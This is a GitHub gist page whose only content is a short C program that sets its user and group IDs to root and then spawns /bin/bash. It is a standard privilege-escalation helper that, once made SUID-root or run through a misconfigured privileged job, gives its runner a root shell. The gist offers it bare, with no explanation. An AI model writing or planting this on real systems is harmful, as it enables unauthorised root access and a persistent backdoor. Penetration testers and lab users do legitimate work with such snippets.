Skip to content

Instantly share code, notes, and snippets.

@itsecurityco
Created July 24, 2015 18:10
Show Gist options
  • Save itsecurityco/4b528ce571c3b0c2efd3 to your computer and use it in GitHub Desktop.
Save itsecurityco/4b528ce571c3b0c2efd3 to your computer and use it in GitHub Desktop.
main() {
setuid(0);
setgid(0);
system("/bin/bash");
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment